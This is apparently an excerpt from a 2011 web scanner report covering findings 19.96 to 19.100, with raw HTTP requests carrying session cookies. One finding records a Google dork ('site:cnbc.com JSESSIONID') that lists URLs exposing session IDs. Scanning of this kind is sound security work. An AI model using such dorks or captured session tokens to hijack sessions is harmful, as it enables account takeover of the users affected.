<li><a href="http://www.pg.com/terms.htm" target="_blank" class="">

Terms & Conditions</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/english/privacy_notice.html" target="_blank" class="">

Privacy Statement</a>
...[SNIP]...
<li><a href="http://www.pg.com/privacy/optsengine/opts_engine_std_brandopts.jhtml?brand=venus" target="_blank" class="">

Unsubscribe</a>
...[SNIP]...


<script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&lID=1&loc=4q-web2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.96. http://www.gillettevenus.com/global/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/global/blank.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.gillettevenus.com/global/blank.html?bv=t&h=959&w=1266

The response contains the following link to another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /global/blank.html?bv=t&h=959&w=1266 HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.2.10.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; IPE_S_7929=7929

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:34 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Mon, 28 Sep 2009 14:48:47 GMT
ETag: "239af8-69a-474a4652191c0"
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 1857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Blank</title>
...[SNIP]...
</script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

19.97. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio

The response contains the following links to other domains:

http://lh6.googleusercontent.com/-WAOI7yULaPU/AAAAAAAAAAI/AAAAAAAAAAA/uQrFDhietY0/s48-c-k/photo.jpg
http://www.atg.com/en/about-atg/careers/s&m..
http://www.atg.com/en/customercare/s&m..
http://www.atg.com/en/products-services/
http://www.atg.com/en/send-us-an-email/s&m...,this.href,'','','','5','','0CG8QjBAwBA')
http://www.atg.com/en/solutions/industry/consumer-business-services/s&m.. ,this.href,'','','','4','','0CGoQjBAwAw')
http://www.atg.com/en/solutions/mid-sized-business/s&m.._,this.href,'','','','3','','0CGUQjBAwAg')

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:31:49 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 36439

BfyINKgQ....S.......0..J...#.....%s#...ATG e-commerce solutio.7$..55DxmTvT1PKPXiALn1sCWCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentNode;return b||google
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/products-services/#&..w..7,this.href,'','','','2','','0CGAQjBAwAQ')">Products & Services</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/solutions/mid-sized-business/s&m.._,this.href,'','','','3','','0CGUQjBAwAg')">Mid-sized Business</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/solutions/industry/consumer-business-services/s&m.. ,this.href,'','','','4','','0CGoQjBAwAw')">Consumer and Business Services</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/send-us-an-email/s&m...,this.href,'','','','5','','0CG8QjBAwBA')">Contact Us</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/about-atg/careers/s&m..",this.href,'','','','6','','0CHQQjBAwBQ')">Careers</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.atg.com/en/customercare/s&m..",this.href,'','','','7','','0CHkQjBAwBg')">Customer Care/Login</a>
...[SNIP]...
<div style="border:0;padding:3px 8px 0 0"><img src="http://lh6.googleusercontent.com/-WAOI7yULaPU/AAAAAAAAAAI/AAAAAAAAAAA/uQrFDhietY0/s48-c-k/photo.jpg" alt="Klint Finley" height=48 style="vertical-align:middle" width=48></div>
...[SNIP]...

19.98. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product

The response contains the following links to other domains:

http://www.directbeautyproducts.com/ProductPicker.aspx?cat=1
http://www.directbeautyproducts.com/ProductPicker.aspx?cat=4
http://www.directbeautyproducts.com/clearance.aspx

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:16 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 32222

BfyINKgQ....S..........7.........7s#...Direct Beauty Product.7$..5HE5mToH0NdHXiAKAxvGwCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentNode;return b||google.
...[SNIP]...
</a> - <a href="http://www.directbeautyproducts.com/ProductPicker.aspx?cat=1" onmousedown="return clk(this,this.href,'','','','3','','0CGoQ0gIoATAC')">Anti-Ageing & Skin care</a> - <a href="http://www.directbeautyproducts.com/clearance.aspx" onmousedown="return clk(this,this.href,'','','','3','','0CGsQ0gIoAjAC')">Clearance</a> - <a href="http://www.directbeautyproducts.com/ProductPicker.aspx?cat=4" onmousedown="return clk(this,this.href,'','','','3','','0CGwQ0gIoAzAC')">Weight Loss & Detoxing</a>
...[SNIP]...

19.99. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Harbottle+%26+Lewis

The response contains the following links to other domains:

http://blog.harbottle.com/
http://en.wikipedia.org/wiki/Harbottle_&_Lewis
http://webcache.googleusercontent.com/search?q=cache:3G5e2SKm7gsJ:www.guardian.co.uk/law/2011/jul/22/harbottle-lewis-waived-privilege+Harbottle+%26+Lewis&cd=9&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:9HzOMndr5xsJ:www.bloomberg.com/news/2011-07-22/harbottle-lewis-under-investigation-in-phone-hacking-case-2-.html+Harbottle+%26+Lewis&cd=15&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:BujBPvisv-kJ:www.legal500.com/firms/1467/offices/224+Harbottle+%26+Lewis&cd=12&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:CY2EQJrDvr4J:en.wikipedia.org/wiki/Harbottle_%2526_Lewis+Harbottle+%26+Lewis&cd=8&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:L_hACEh7fecJ:www.thefirstpost.co.uk/83167,news-comment,news-politics,clive-goodman-letter-is-harbottle-lewis-letter-also-raises-questions-phone-hacking+Harbottle+%26+Lewis&cd=14&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:N52afrSeJL0J:www.facebook.com/pages/Harbottle-Lewis/108207205869774+Harbottle+%26+Lewis&cd=17&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:_AGp_3uboA8J:www.harbottle.com/+Harbottle+%26+Lewis&cd=1&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:oAI0NchODmAJ:www.linkedin.com/company/harbottle-%26-lewis+Harbottle+%26+Lewis&cd=16&hl=en&ct=clnk&gl=us
http://www.bloomberg.com/news/2011-07-22/harbottle-lewis-under-investigation-in-phone-hacking-case-2-.html
http://www.clintons.co.uk/
http://www.dailymail.co.uk/news/article-2015461/News-World-phone-hacking-Why-did-Prince-Williams-lawyers-hide-evidence.html
http://www.facebook.com/pages/Harbottle-Lewis/108207205869774
http://www.guardian.co.uk/law/2011/jul/22/harbottle-lewis-waived-privilege
http://www.harbottle.com/
http://www.harbottle.com/hnl/pages/hnl_about.php
http://www.harbottle.com/hnl/pages/hnl_careers.php
http://www.harbottle.com/hnl/pages/hnl_contact.php
http://www.harbottle.com/hnl/pages/hnl_people.php
http://www.harbottle.com/hnl/upload/documents/PubFootball1.pdf
http://www.incelaw.com/
http://www.legal500.com/firms/1467/offices/224
http://www.legalweek.com/legal-week/news/2107023/murdoch-wrong-blame-harbottle-ni-legal-director
http://www.linkedin.com/company/harbottle-&-lewis
http://www.olswang.com/
http://www.telegraph.co.uk/news/uknews/phone-hacking/8666765/Phone-hacking-royal-law-firm-Harbottle-and-Lewis-in-negotiations-with-police-over-News-International-emails.html
http://www.thefirstpost.co.uk/83167,news-comment,news-politics,clive-goodman-letter-is-harbottle-lewis-letter-also-raises-questions-phone-hacking
http://www.wedlakebell.com/
http://www.youtube.com/results?q=Harbottle+%26+Lewis&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Harbottle+%26+Lewis HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 105544

<!doctype html> <head> <title>Harbottle & Lewis - Google Search</title> <script>window.google={kEI:"nk1mTpOFD6LfiAL3u8SVCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttrib
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=Harbottle+%26+Lewis&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.harbottle.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CCEQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:_AGp_3uboA8J:www.harbottle.com/+Harbottle+%26+Lewis&cd=1&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:_AGp_3uboA8J:www.harbottle.com/+Harbottle+%26+Lewis&cd=1&hl=en&ct=clnk&gl=us','','','','1','','0CCMQIDAA')">Cached</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.harbottle.com/hnl/pages/hnl_people.php" class=l onmousedown="return clk(this,this.href,'','','','2','','0CCgQjBAwAQ')">Our People</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.harbottle.com/hnl/pages/hnl_careers.php" class=l onmousedown="return clk(this,this.href,'','','','3','','0CC0QjBAwAg')">Careers</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.harbottle.com/hnl/pages/hnl_contact.php" class=l onmousedown="return clk(this,this.href,'','','','4','','0CDIQjBAwAw')">Contact Us</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.harbottle.com/hnl/upload/documents/PubFootball1.pdf" class=l onmousedown="return clk(this,this.href,'','','','5','','0CDcQjBAwBA')">Pub football and the future of <b>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://blog.harbottle.com/" class=l onmousedown="return clk(this,this.href,'','','','6','','0CDwQjBAwBQ')">Blog</a>
...[SNIP]...
<h3 class=r style="display:inline"><a href="http://www.harbottle.com/hnl/pages/hnl_about.php" class=l onmousedown="return clk(this,this.href,'','','','7','','0CEEQjBAwBg')">About Us</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Harbottle_%26_Lewis" class=l onmousedown="return clk(this,'http://en.wikipedia.org/wiki/Harbottle_%26_Lewis','','','','8','','0CEkQFjAH')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:CY2EQJrDvr4J:en.wikipedia.org/wiki/Harbottle_%2526_Lewis+Harbottle+%26+Lewis&cd=8&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:CY2EQJrDvr4J:en.wikipedia.org/wiki/Harbottle_%2526_Lewis+Harbottle+%26+Lewis&cd=8&hl=en&ct=clnk&gl=us','','','','8','','0CEsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.guardian.co.uk/law/2011/jul/22/harbottle-lewis-waived-privilege" class=l onmousedown="return clk(this,this.href,'','','','9','','0CFAQFjAI')">How far can legal professional privilege go? | Neil Rose | Law <b>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:3G5e2SKm7gsJ:www.guardian.co.uk/law/2011/jul/22/harbottle-lewis-waived-privilege+Harbottle+%26+Lewis&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:3G5e2SKm7gsJ:www.guardian.co.uk/law/2011/jul/22/harbottle-lewis-waived-privilege+Harbottle+%26+Lewis&cd=9&hl=en&ct=clnk&gl=us','','','','9','','0CFIQIDAI')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.legalweek.com/legal-week/news/2107023/murdoch-wrong-blame-harbottle-ni-legal-director" class=l onmousedown="return clk(this,this.href,'','','','10','','0CFYQqQIwCQ')">Murdoch 'wrong' to blame <em>
...[SNIP]...
<h3 class="r"><a href="http://www.telegraph.co.uk/news/uknews/phone-hacking/8666765/Phone-hacking-royal-law-firm-Harbottle-and-Lewis-in-negotiations-with-police-over-News-International-emails.html" class=l onmousedown="return clk(this,this.href,'','','','11','','0CF8QFjAK')">Phone hacking: royal law firm <em>
...[SNIP]...
<h3 class="r"><a href="http://www.legal500.com/firms/1467/offices/224" class=l onmousedown="return clk(this,this.href,'','','','12','','0CGUQFjAL')">The Legal 500 > <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:BujBPvisv-kJ:www.legal500.com/firms/1467/offices/224+Harbottle+%26+Lewis&cd=12&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:BujBPvisv-kJ:www.legal500.com/firms/1467/offices/224+Harbottle+%26+Lewis&cd=12&hl=en&ct=clnk&gl=us','','','','12','','0CGgQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dailymail.co.uk/news/article-2015461/News-World-phone-hacking-Why-did-Prince-Williams-lawyers-hide-evidence.html" class=l onmousedown="return clk(this,this.href,'','','','13','','0CG0QFjAM')">News of the World phone hacking: Why did Prince William's lawyers <b>
...[SNIP]...
<h3 class="r"><a href="http://www.thefirstpost.co.uk/83167,news-comment,news-politics,clive-goodman-letter-is-harbottle-lewis-letter-also-raises-questions-phone-hacking" class=l onmousedown="return clk(this,this.href,'','','','14','','0CHIQFjAN')">Clive Goodman letter and <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:L_hACEh7fecJ:www.thefirstpost.co.uk/83167,news-comment,news-politics,clive-goodman-letter-is-harbottle-lewis-letter-also-raises-questions-phone-hacking+Harbottle+%26+Lewis&cd=14&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:L_hACEh7fecJ:www.thefirstpost.co.uk/83167,news-comment,news-politics,clive-goodman-letter-is-harbottle-lewis-letter-also-raises-questions-phone-hacking+Harbottle+%26+Lewis&cd=14&hl=en&ct=clnk&gl=us','','','','14','','0CHQQIDAN')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bloomberg.com/news/2011-07-22/harbottle-lewis-under-investigation-in-phone-hacking-case-2-.html" class=l onmousedown="return clk(this,this.href,'','','','15','','0CHgQFjAO')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:9HzOMndr5xsJ:www.bloomberg.com/news/2011-07-22/harbottle-lewis-under-investigation-in-phone-hacking-case-2-.html+Harbottle+%26+Lewis&cd=15&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:9HzOMndr5xsJ:www.bloomberg.com/news/2011-07-22/harbottle-lewis-under-investigation-in-phone-hacking-case-2-.html+Harbottle+%26+Lewis&cd=15&hl=en&ct=clnk&gl=us','','','','15','','0CHoQIDAO')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.linkedin.com/company/harbottle-&-lewis" class=l onmousedown="return clk(this,this.href,'','','','16','','0CH4QFjAP')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:oAI0NchODmAJ:www.linkedin.com/company/harbottle-%26-lewis+Harbottle+%26+Lewis&cd=16&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:oAI0NchODmAJ:www.linkedin.com/company/harbottle-%26-lewis+Harbottle+%26+Lewis&cd=16&hl=en&ct=clnk&gl=us','','','','16','','0CIABECAwDw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/pages/Harbottle-Lewis/108207205869774" class=l onmousedown="return clk(this,this.href,'','','','17','','0CIQBEBYwEA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:N52afrSeJL0J:www.facebook.com/pages/Harbottle-Lewis/108207205869774+Harbottle+%26+Lewis&cd=17&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:N52afrSeJL0J:www.facebook.com/pages/Harbottle-Lewis/108207205869774+Harbottle+%26+Lewis&cd=17&hl=en&ct=clnk&gl=us','','','','17','','0CIYBECAwEA')">Cached</a>
...[SNIP]...
<div><a href="http://www.olswang.com/" class=l onmousedown="return clk(this,this.href,'','','','18','','0CIsBEKIIMBE')">Olswang</a>
...[SNIP]...
<div><a href="http://www.clintons.co.uk/" class=l onmousedown="return clk(this,this.href,'','','','19','','0CI0BEKIIMBI')">Clintons</a>
...[SNIP]...
<div><a href="http://www.wedlakebell.com/" class=l onmousedown="return clk(this,this.href,'','','','20','','0CI8BEKIIMBM')">Wedlake Bell</a>
...[SNIP]...
<div><a href="http://www.incelaw.com/" class=l onmousedown="return clk(this,this.href,'','','','21','','0CJEBEKIIMBQ')">Ince and Co</a>
...[SNIP]...

19.100. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=site%3Acnbc.com+JSESSIONID

The response contains the following links to other domains:

http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&phrase=Muni+Bonds%3A+Time+to+Buy%3F&page=0
http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&phrase=Eye+on+Europe's+Economy&page=1
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&phrase=Options+Action+Web+Extra
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&phrase=Alcoa+Earnings+Reaction
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&phrase=Soft+Landing+or+Hard+Landing+for+China%3F
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&phrase=Investments+for+High+Net+Worth
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&phrase=Fundraiser-in-Chief
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer
http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst
http://videoreprints.cnbc.com/search.action;jsessionid=B2F5063C1050C7893BD8840513A5ABB2?phrase=Commodity+Price+Check
http://webcache.googleusercontent.com/search?q=cache:681MsvVQ1sYJ:videoreprints.cnbc.com/search.action%3Bjsessionid%3DB2F5063C1050C7893BD8840513A5ABB2%3Fphrase%3DCommodity%2BPrice%2BCheck+site:cnbc.com+JSESSIONID&cd=10&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:8WxAEA7fJFEJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D11B292CC4219086DCD47B8876891F233%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%253D%253D%26phrase%3DOptions%2BAction%2BWeb%2BExtra+site:cnbc.com+JSESSIONID&cd=1&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:FdhCl3P1wEsJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3D639562A329F750EF6CECEF52850FF058%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%253D%253D%26phrase%3DAlcoa%2BEarnings%2BReaction+site:cnbc.com+JSESSIONID&cd=6&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:KAqXj9MU2ogJ:videoreprints.cnbc.com/cart_add.action%3Bjsessionid%3D93C40ADFE94CC07D57F86DD9E23EF04B%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%253D%253D%26phrase%3DEye%2Bon%2BEurope's%2BEconomy%26page%3D1+site:cnbc.com+JSESSIONID&cd=9&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:MXNjqSbiM0oJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DDED5E23C761652B8ED8438990C240549%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%253D%253D%26phrase%3DTalking%2BNumbers%253A%2BCashing%2Bin%2Bon%2Bthe%2BConsumer+site:cnbc.com+JSESSIONID&cd=7&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:SfXHZFTE3k4J:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DB55B909145331242FF6DF4FCC879CCA8%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%253D%253D%26phrase%3DFundraiser-in-Chief+site:cnbc.com+JSESSIONID&cd=3&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:X_00EaoXOEwJ:videoreprints.cnbc.com/cart_remove.action%3Bjsessionid%3DF106A5792CA8BDD181F1F225115A4E13%3Fparms%3DVy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%253D%253D%26phrase%3DJoint%2BEU-IMF%2BAid%2BMay%2BNot%2BBe%2BAll%2BThat%2BGreat%253A%2BAnalyst+site:cnbc.com+JSESSIONID&cd=5&hl=en&ct=clnk&gl=us
